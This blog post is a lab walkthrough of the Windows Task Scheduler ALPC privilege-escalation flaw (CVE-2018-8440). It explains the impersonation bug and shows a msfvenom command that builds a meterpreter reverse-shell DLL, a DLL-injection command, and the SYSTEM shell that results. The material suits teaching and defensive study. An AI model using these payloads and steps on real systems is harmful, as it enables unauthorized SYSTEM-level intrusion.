Latest Exploit: Privilege Escalation via Windows Task Scheduler

Sharing is caring!

A Local privilege escalation vulnerability exists in Windows Task Scheduler Service, through which a local unprivileged user can change file permissions of an file leading to System privileges. This have a CVSS score of 7.8. Replacing a system file and then waiting for a privileged user to access it will escalate our privileges. The DLL (Dynamic Link Library) associated with Spoolsv.exe process could be replaced (through hardlink) and could be executed by Spoolsv.exe process to load it.

Understanding the Scenario

A process running with User a privileges must perform impersonation while a User B (logged on user) requests some resources process. This is the proper method in security context, now the process running with User A privileges impersonate User B privileges and then perform the action. After the action is complete the process revert back to its original privileges.

windows privielge escalation task scheduler

However the scenario here, Task scheduler is a process running with system privileges. The process must have to follow the desired way of impersonation while performing an action with different privileges but the process failed to do so. If User B (logged on user) requests SchRpcSetSecurity method, the process must impersonate the User B privileges and perform the action but it uses its own SYSTEM privileges to do. We will leverage this vulnerability and try to exploit the condition.

Advanced Local Inter-Process Communication (ALPC)

It is a high speed message based communication mechanism implemented in NT kernel. It can be used for communication between:

  • Two User mode processes.
  • One User mode and One Kernel mode drivers.
  • Two Kernel mode drivers.

LPC is used throughout the local system and it is not used remotely. Remote Procedure Call (RPC) is used for communication between 2 different systems. ALPC was arrived in Windows Vista deprecating the use of LPC. The ALPC works in client server model and all the calls from Client to Server are asynchronous (Client/Server do not wait for the server to respond). The Local Security Authority Subsystem Service (LSASS), Session Manager (SMSS), and Service.

Control Manager all use (A)LPC ports directly to communicate with client processes. Winlogon and the Security Reference Monitor use it to communicate with the LSASS process.

Task Scheduler’s SchRpcSetSecurity method can be called by any local process which then sets a security descriptor on a file or folder through Advanced Local Inter-Process Communication. The above said method fails to impersonate the requesting process or client when setting security descriptor, which then leads to change of Access Control List (ACL) of the file or folder through Task Scheduler.

We will demonstrate the following through POC (https://github.com/bharadwajyas/TasScheduler_ALPC-Exploit )

  1. As any user can create a file under C:\Windows\tasks folder, the POC will create a file job which is a hardlink to the Spoolsv.exe process trusted PrintConfig.dll. Privilege Escalation via Windows Task Scheduler ServiceFinding the location of PrintConfig.dll Privilege Escalation via Windows Task Scheduler Service 2
  2. Changing permissions of UpdateTask.job by calling SchRpcSetSecurity Task Scheduler’s method. Modifying the permissions of the above file will update the permissions of the PrintConfig.dll file, which will become user modifiable.
  3. Replace dll with malicious DLL (which will give a reverse shell on our attacker machine).
  4. The modified dll will load and perform the attacker defined actions.

 

Lab Setup

Operating SystemOS VersionHotfix AppliedUser Logged onIPv4
Kali LinuxKali 2017.2root192.168.245.145
Windows 10 (x64)Microsoft Windows 10 Enterprise 2016 LTSB

(10.0.14393 N/A Build 14393)
KB3176936
KB4033631
KB4049411
KB4054590
KB4485447
KB4493478
KB3193494
admin user (under-privileged user)192.168.245.134

Demonstration

Open Process explorer with administrator privileges. Let’s have a look at the privileges of spoolsv.exe process (system).

Privilege Escalation via Windows Task Scheduler Service 3

The ‘adminuser’ is a member of Users group, we can verify it as follows:-

net user adminuser

Privilege Escalation via Windows Task Scheduler Service 4

Now open a command prompt with normal privileges and then open a notepad within the command prompt.

Privilege Escalation via Windows Task Scheduler Service 5

We can have a look at the spawned process on the process explorer.

Privilege Escalation via Windows Task Scheduler Service 6

It is clearly visible that the Process ID associated with the notepad process is 5068 (note this we will soon be using this in the exploit) which is spawned under cmd.exe process. We will now head straight to the exploit and run the following command (Note that we have opened the powershell window with Normal privileges).

Privilege Escalation via Windows Task Scheduler Service 7

After firing the exploit we found that the notepad is now running under spoolsv.exe process with SYSTEM privileges.

Privilege Escalation via Windows Task Scheduler Service 8

We will be hooking our own malicious DLL to the main DLL file (that would be injected to spoolsv.exe process).  Currently, ALPC-TaskSched-LPE.dll file is hooked with exploit.dll present under ‘Resources’ folder which by default loads the notepad process to the spoolsv.exe process.

Privilege Escalation via Windows Task Scheduler Service 9

Using msfvenom we will generate a malicious DLL that will connect back to our attacking machine (kali box). As the target machine is a 64-bit architecture machine, we will be using the below shown payload.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.245.134 lport=444 -f dll > lol.dll

Privilege Escalation via Windows Task Scheduler Service 9

CFF explorer is a Portable Executable (PE) editor which support .NET framework, we will be using this to hook our malicious DLL to the original/final DLL (ALPC-TaskSched-LPE.dll). Hooking the malicious DLL to the original DLL file using CFF explorer as follows:-

Privilege Escalation via Windows Task Scheduler Service 10

The view of the CFF explorer will look like below figure. We need to Go to Resource Editor > RCDATA then select the malicious dll (lol.dll) to hook to the original dll.

Privilege Escalation via Windows Task Scheduler Service 11

The Contents of the exploit.dll is shown below. The RCDATA defines a raw data for an application. Raw data resources permit the inclusion of binary data directly in the executable file.

Privilege Escalation via Windows Task Scheduler Service 12

Privilege Escalation via Windows Task Scheduler Service 13

Select the malicious DLL from the console.

Privilege Escalation via Windows Task Scheduler Service 14

Overwrite the original file and save it. We have overwrite the original DLL file because it is written in the POC exploit that it load the DLL with the name ALPC-TaskSched-LPE.

Privilege Escalation via Windows Task Scheduler Service 15

Or we can just load a DLL with our own file name, modifying the original file name of the DLL in the exploit.

The malicious DLL file is loaded to the \x64\ALPC-TaskSched-LPE.dll

Now, we will open a new powershell window with normal privileges and start our listener on the attacker box (kali) on TCP port 444. Execute the following command and provide the Process ID of the notepad process.

Injectdll.exe 5068 \x64\ALPC-TaskSched-LPE.dll

Privilege Escalation via Windows Task Scheduler Service 16

The Process Explorer showing the newly spawned processes which connect back to the attacker machine (got after 5-10 retries 😊)

Privilege Escalation via Windows Task Scheduler Service 17

And on the attacker machine, we got a system shell!!!

Privilege Escalation via Windows Task Scheduler Service 19

We can spawn a shell and have a look at the privileges.

We can verify the connection from the victim machine through:

netstat -an

Privilege Escalation via Windows Task Scheduler Service 21

The above discussed exploit works on most of the latest Windows products like Windows 10 (32 bit and 64 bit), Windows Server 2016. This blog is for educational purposes only and the author is not responsible for any misconduct behavior by the viewers. Stay tuned for our next blog post. Till then HacknPentest!!

 

Author: – Yash Bharadwaj

Maintained by: – Puneet Choudary

 

References:-

https://nvd.nist.gov/vuln/detail/CVE-2018-8440#vulnCurrentDescriptionTitle

https://github.com/bharadwajyas/TasScheduler_ALPC-Exploit

https://blogs.msdn.microsoft.com/ntdebugging/2007/07/26/lpc-local-procedure-calls-part-1-architecture/

https://en.wikipedia.org/wiki/Local_Inter-Process_Communication

https://blog.0patch.com/2018/08/how-we-micropatched-publicly-dropped.html

 

Share

You may also like...

4 Responses

  1. Harsh Shrivastava says:

    Great work.
    Easy to understand

  2. Amit Dwivedi says:

    Well explained and we’ll illustrated by number of tries u guys did. Really great work

Leave a Reply

Your email address will not be published. Required fields are marked *